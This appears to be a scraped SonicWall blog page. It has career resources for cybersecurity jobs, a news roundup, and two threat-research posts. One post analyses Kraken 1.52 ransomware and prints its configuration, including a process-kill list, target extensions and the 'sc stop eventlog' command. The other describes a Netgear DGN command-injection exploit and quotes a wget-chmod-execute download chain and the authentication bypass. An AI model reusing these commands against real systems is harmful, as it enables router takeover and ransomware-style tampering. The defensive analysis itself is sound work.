WiCyS Women in CyberSecurity WiCyS Women in CyberSecurity
Women in Security and Privacy Grace Hopper Celebration
National Center for Women & Information Technology OURSA – Our Security Advocates
SWE – Society of Women Engineers Scholarships
She Secures Raytheon’s Women Cyber Security Scholarship Program
Women in Defense (WID) (ISC)² Women’s CyberSecurity Scholarships
Women’s Security Society (WSS) Scholarship for Women Studying Information Security

Why Veterans Are Ideal Cybersecurity Pros

Many cybersecurity vendors are tapping into a different resource: military veterans. Highly skilled and easily trained, veterans are key to helping close the cybersecurity skills gap.

Better yet, they have unique skills that aren’t always easy to find in civilian sectors. Many veterans possess the right characteristics for working in high-pressure situations, such as a real-time security operations center (SOC).

“Efficient security operations teams operate in what’s called a ‘high-op tempo’ environment,” said Wayne Reynolds, an 18-year veteran of the United States Marine Corps and current CISO of Armor, a cloud security MSSP. “Veterans live this every day they are deployed.

“Most veterans I know operate extremely well in high-stress situations. In security, as you are combatting threats, you need to keep a cool, calm view of the situation. Veterans do this extremely well.”

In some unique cases, veterans may also possess valuable security clearances that could make them attractive to companies that operative in state and federal arenas, or in matters of government or industry compliance.

If you’re not a veteran, the military is an attractive option to gain hands-on, real-world experience in related fields. Acquired skills will be highly marketable when you transition back to civilian roles.

Resources for Military Cyber Careers

Your Cybersecurity Career: How to Get Started

More than 768,000 people are employed in cybersecurity in the U.S. But hundreds of thousands of jobs remain unfilled.

Top Cybersecurity Job Titles

  • Cybersecurity Engineer
  • Cybersecurity Analyst
  • Network Engineer/Architect
  • Cybersecurity Manager/Administrator
  • Systems Engineer
  • Software Developer/Engineer
  • Vulnerability Analyst/Penetration Tester
  • Systems Administrator
  • IT Auditor

Source: CyberSeek.org

Cybersecurity represents a lucrative career path for those interested in technology, computer science, engineering, network and cloud architecture, IT management, software development, threat intelligence and cyberattack forensics.

While salaries are largely dependent on skill set, experience, industry and region, cybersecurity pay can easily exceed $200,000 (USD) per year. This is particularity achievable when professionals begin directing full SOCs or move into executive positions, like chief security officer (CSO) or chief information security officer (CISO).

But there are opportunities for many professionals, particularly those who are trainable and adept at solving problems.

“I look for two things in all candidates. First, inquisitiveness. Good security folks are big problem-solvers and are always curious,” said Reynolds. “Second, modesty. If you have an inquisitive person who is modest, you can teach them anything.”

Common Cybersecurity Career Paths

Source: CyberSeek.org

Three of the most common ways of pursuing a carrier in cybersecurity include formal education, certifications and, as outlined above, military service. Not every path is suited for every personality. It’s important to find a program that works for you, but be sure it includes applicable, hands-on experience as well as job-placement programs.

Cybersecurity Certification

Certifications are a common, cost-effective approach to building cybersecurity acumen. SonicWall offers an extensive training curriculum path for security experts seeking to enhance their knowledge and maximize their investment in SonicWall network security products. This practice is common for security vendors committed to training cybersecurity professionals. SonicWall’s primary certification programs are:

But certifications — CISSP, CISM, CISA, ISSA, ISACA, (ISC)², Security+, Certified Ethical Hacker, CSSP, SNSA and the like — only tell part of the story. While they demonstrate a willingness to train, many cybersecurity recruiters want to know that what has been learned can be applied to the job.

“I worry less about education and tend to stay away from folks that list a plethora of certifications,” said Reynolds. “But if I see someone with an advanced degree or multiple years in the field, I take a look. The ability to practically apply education is critical.”

Cybersecurity Education

Universities and institutions of higher learning now offer dedicated cybersecurity curricula. For example, CyberDegrees offers an online resource that outlines top degree paths, sample coursework and tools for finding cybersecurity programs in 44 states.

“Similar to most undergraduate programs, online cybersecurity degrees typically require students to complete 120 to 126 credits,” notes U.S. News & World Report. “While there are accelerated programs, full-time students usually graduate within four years.”

Training & Educational Resources

Various government, private and non-profit organizations provide complimentary tools and resources to aid individuals in training for cybersecurity jobs. If you’re just starting your path toward a cybersecurity career or looking for a career change, leverage the below sites to help guide your path.

About Cybersecurity Awareness Month

The 15th annual National Cybersecurity Awareness Month (NCSAM) highlights user awareness among consumers, students/academia and business. NCSAM 2018 addresses specific challenges and identifies opportunities for behavioral change. It aims to remind everyone that protecting the internet is “Our Shared Responsibility.”

In addition, NCSAM 2018 will shine a spotlight on the critical need to build a strong, cyber secure workforce to help ensure families, communities, businesses and the country’s infrastructure are better protected through four key themes:

  • Oct. 1-5: Make Your Home a Haven for Online Safety
  • Oct. 8-12: Millions of Rewarding Jobs: Educating for a Career in Cybersecurity
  • Oct. 15-19: It’s Everyone’s Job to Ensure Online Safety at Work
  • Oct. 22-26: Safeguarding the Nation’s Critical Infrastructure

Learn more at StaySafeOnline.org.

Cyber Security News & Trends – 10-05-18

/0 Comments/in /by

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.

SonicWall Spotlight

Facebook Hack: People’s Accounts Appear for Sale on Dark Web – The Independent (UK)

  • SonicWall CEO Bill Conner shares his thoughts on the fallout from the recent Facebook hack.

The A-Z of Security Threats 2018 – ITPro

  • SonicWall’s Laurence Pingree mans the letter E in this alphabet of cybersecurity threats for 2018.

100 People You Don’t Know but Should 2018 – CRN

  • Congratulations to John Mullen, included in the CRN 2018 list.

UK and Allies Accuse Russia of Cyber Attack Campaign – ComputerWeekly

  • SonicWall CEO Bill Conner encourages global co-operation following the UK National Cyber Security Centre (NCSC) directly linking Russia with cyberattacks.

Cyber Security News

National Cybersecurity Awareness MonthOfficial Website

  • October marks the 15th annual National Cybersecurity Awareness Month (NCSAM). Follow the activity online using the hashtags #NCSAM and #CyberAware.

The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies – Bloomberg

  • Hardware hacks are rare but, if successful, the payoff for them can be huge. Both Amazon and Apple may have been the victim of such a hack.

Meet Torii, a New IoT Botnet Far More Sophisticated Than Mirai Variants  – ZDNet

  • A very sophisticated Internet of Things botnet has been found and experts are impressed, “The author is not your average script kiddie.”

BUPA Fined $228,000 After Stolen Data Surfaces on Dark Web – BankInfoSecurity

  • British data-protection regulators are taking a dim view of companies who are not exercising good cybersecurity practises.

Gwinnett Medical Center Investigates Possible Data Breach – ZDNet

  • A security incident has led to a possible leak of patient information online.

Facebook Hack Puts Thousands of Other Sites at Risk – The New York Times

  • The Facebook hack has major implications for any site that uses Facebook as a login tool.

Malware Scam Targets Fortnite Cheaters and Their Bitcoin Wallets – CNET

  • If you’re looking to cheat at Fortnite then you are at risk of being cheated yourself.

In Case You Missed It

Kraken 1.52 Ransomware served by compromised Anti Spyware site

/in /by

The SonicWall Capture Labs Threat Research Team have been recently tracking new a ransomware family known as Kraken.  This ransomware has reportedly been served by a compromised anti spyware site superantispyware.com.  The operators demand 0.75 BTC for file decryption and are quick to tell you not to waste their time if you are not serious.

Infection Cycle:

The malware executable file contains the following metadata:

Upon infection, the trojan encrypts files on the system and drops # How to Decrypt Files.html into every directory containing encrypted files.  # How to Decrypt Files.html contains the following html page:

Encrypted files are named <numericvalue>-lock.onion.  eg. 00000001-lock.onion, 00000002-lock.onion etc.  The numeric value is incremented for each file encrypted.

The trojan makes a DNS request to ipinfo.io and obtains the victims external ip address.  Apart from this there is no other network traffic.

Upon inspecting the malware executable file we came across an embedded configuration file.  This suggests that it may be generated from a ransomware creation kit.  The configuration file contains the following data in JSON format:

 

"project":{
    "name":"kraken",
    "version":1.52,
    "comment":"When the researchers party hard, our parties harder!"
},

"module":{
    "anti_forensic":true,
    "anti_revere":true,
    "anti_virtual": false,
    "anti_smb":false,
    "anti_rdp":false,
    "country_check":true,
    "keyboard_check":true,
    "registry_check":true,
    "fix_device":true,
    "network_device":true,
    "flash_device":true,
    "extension_bypass":true,
    "rapid_mode":true
},

"core": {
    "public_key": "2kHjgBUx6QQSkwRnLs5c/AdbjroDU4j5AanCabrpjBLnKCWGKwmlWQZR/
    RcCRF5KyAfMmPIks1JYEvh9bMh1Mv1CvbofBi4/HAttuictsmiVSRvMxRNDw3U29W0Li/PoSOYfBPUvHP58BhLTt3G5/
    AikhhHmf4FGtigUEkq5n/u60Zh0362s2nY1Ev0qEx+d45oDnYaoMIlihrcxtho7uqbu1sZPsgezzyEBl7f2BKOjXxD4ML8Cpwv69EHH
    +3tgt2gn9ys921NI3d3gjI8Z+GRSYnKNx1qRCoiCPQqL6MjUHEEOXkMOWITh/CacwQDMEEn2SlxDDisLvybdjw9y1Q==",
    "support_email_1": "onionhelp@memeware.net",
    "support_email_2": "BM-2cWdhn4f5UyMvruDBGs5bK77NsCFALMJkR@bitmessage.ch",
    "price": 0.75,
    "price_unit": "BTC",
    "new_extension": "onion",
    "main_cipher_key_size": 128,
    "session_cipher_key_size": 64,
    "aes_cipher_key_size": 32,

 

The configuration contains the following files and directories to be skipped:

"skip_files": [
    "bootsect.bak",
    "desktop.ini",
    "iconcache.db",
    "ntuser.dat",
    "thumbs.db"
],

"skip_directories": [
    "$recycle.bin",
    "system volume information",
    "$windows.~bt",
    "boot",
    "drivers",
    "programdata",
    "all users",
    "windows",
    "windows.old",
    "appdata",
    "programdata",
    "sample videos",
    "sample pictures",
    "sample music",
    "my videos",
    "my pictures",
    "my music",
    "test folder"
],

 

It will also kill the following processes if running:

"process_stop": [
    "agntsvcagntsvc",
    "agntsvcencsvc",
    "agntsvcisqlplussvc",
    "dbeng50",
    "dbsnmp",
    "firefoxconfig",
    "msftesql",
    "mydesktopqos",
    "mydesktopservice",
    "mysqld",
    "mysqld-nt",
    "mysqld-opt",
    "ocomm",
    "ocssd",
    "oracle",
    "sqbcoreservice",
    "sqlagent",
    "sqlbrowser",
    "sqlservr",
    "sqlwriter",
    "sqlwb",
    "synctime",
    "tbirdconfig",
    "xfssvccon"
],

The configuration has a “target_extensions” section. Files with the following extensions will be encrypted:

1cd 3dm 3ds 3fr 3g2 3gp 3pr 7z 7zip aac ab4 abd accdb accde accdr accdt ach acr act adb adp
ads agdl ai aiff ait al aoi apj arw ascx asf asm asp aspx asx atb avi awg back backup backupdb
bak bank bay bdb bgt bik bin bkp blend bmp bpw c cdb cdf cdr cdr3 cdr4 cdr5 cdr6 cdrw cdx
ce1 ce2 cer cfg cfn cgm cib class cls cmt config contact cpi cpp cr2 craw crt crw cs csh cs
csl css csv dac dat db db3 dbf dbx db_journal dc2 dcr dcs ddd ddoc ddrw dds def der des design
dgc dit djvu dng doc docm docx dot dotm dotx drf drw dtd dwg dxb dxf dxg edb eml eps erbsql
erf exf fdb ffd fff fh fhd fla flac flb flf flv flvv fpx fxg gif gray grey groups gry h hbk
hdd hpp html ibank ibd ibz idx iif iiq incpas indd info info_ ini jar java jnt jpe jpeg jpg js
json kc2 kdbx kdc key kpdx kwm laccdb lck ldf lit lock log lua m m2ts m3u m4p m4v mab mapimail
max mbx md mdb mdc mdf mef mfw mid mkv mlb mmw mny moneywell mos mov mp3 mp4 mpeg mpg mrw msf
msg myd nd ndd ndf nef nk2 nop nrw ns2 ns3 ns4 nsd nsf nsg nsh nvram nwb nx2 nxl nyf oab obj
odb odc odf odg odm odp ods odt ogg oil omg orf ost otg oth otp ots ott p7b p7c p12 pab pages
pas pat pbf pcd pct pdb pdd pdf pef pem pfx php pif pl plc plus_muhd pm! pm pmi pmj pml pmm
pmo pmr pnc pnd png pnx pot potm potx ppam pps ppsm ppsm ppsx ppt pptm pptm pptx prf ps psafe3
psd pspimage pst ptx pwm py qba qbb qbm qbr qbw qbx qby qcow qcow2 qed qtb r3d raf rar rat raw
rdb rm rtf rvt rw2 rwl rwz s3db safe sas7bdat sav save say sd0 sda sdb sdf sh sldm sldx sql
sqlite sqlite-shm sqlite-wal sqlite3 sqlitedb sr2 srb srf srs srt srw st4 st5 st6 st7 st8 stc
std sti stm stw stx svg swf sxc sxd sxg sxi sxm sxw tbb tbn tex tga thm tlg tlx txt usr vbox
vdi vhd vhdx vmdk vmsd vmx vmxf vob wab wad wallet war wav wb2 wma wmf wmv wpd wps x3f x11 xis
xla xlam xlk xlm xlr xls xlsb xlsm xlsx xlt xltm xltx xlw xml ycbcra yuv zip

The Trojan attempts to stop the event log service by issuing the command “sc stop eventlog”:

We had the following conversation with the operator via email.  The operator demands 0.75 BTC ($4,923USD) for file recovery:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Kraken.RSM (Trojan)
  • GAV: Kraken.RSM_2 (Trojan)
  • GAV: KrakenCryptor.KJ (Trojan)

Massive IOT attack targeting unpatched Netgear devices

/in /by

SonicWall Threat Research Lab has recently spotted a massive IOT attack, attempting to exploit a remote code execution vulnerability in Netgear DGN series routers.  It seems to have started over the weekend and the detection rate has been spiking for the last few days. We observed over 100,000 attacks coming from different IP addresses to exploit ~7000 firewalls. 

Vulnerability |  NETGEAR DGN Unauthenticated Remote Command Execution:

The vulnerability is due to insufficient validation of the user input within the setup.cgi script. An attacker could exploit the vulnerability by sending a crafted HTTP request. Processing such request could allow a remote attacker to execute arbitrary commands with root privileges.

Additionally web server skips authentication checks for URLs containing the substring “currentsetting.htm”. Attackers can leverage this vulnerability to bypass existing authentication. Then, “setup.cgi” page can even be exploited by unauthenticated remote attacker to execute arbitrary commands with root privileges

Netgear DGN1000 devices with firmware versions prior to 1.1.00.48 and Netgear DGN2200 version 1 are affected by this vulnerabaility.

Exploit:

Attacker scans port 8080 and 80 by initiating a socket connection. If a connection is made, an exploit attempt is made.

Below is the http request sent to Netgear routers.

Basically this URL leverages the “syscmd” function of the “setup.cgi” script to execute arbitrary commands. In the example above the command being executed is “wget http://localhost/netgear.sh -O /var/tmp/netgear.sh; chmod 777 /var/temp/netgear.sh; /var/tmp/netgear.sh; /var/tmp/netgear.sh; rm -rf /var/tmp/netgear.sh”. It downloads a malicious shell script to /var/tmp/,  changes the file properties to allow execution, executes the script and then forces the recursive removal of the directory. The output of the command is sent to the attacker in the resulting web page . And with currentsetting.htm=1 appended to the URL, unauthenticated remoter attacker can bypass authentication to execute the command

If the exploitation is successful, it is possible that the infected routers could be used as Bots or as Crypto Coin Mining Zombies

Trend Chart:

The below trend line shows how this vulnerability is being exploited in the wild

 

Heat Map:

This attack hit nearly 75 countries but most hits observed in United States and India.

 

Patch:

Netgear has released firmware updates that fix the unauthenticated remote code execution vulnerability for all affected products.

Upgrade the Netgear software to DGN1000 1.1.00.48 / DGN2200 v3 or higher.

Visit the NETGEAR Download Center to download the latest firmware for your Netgear product

 

Sonicwall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS: 13034 NETGEAR DGN Devices Remote Command Execution
  • IPS: 13632 NETGEAR DGN Devices Remote Command Execution 2
  • WAF: 9009 Unauthorized Remote File Access
  • WAF: 9012 System Command Injection Variant 2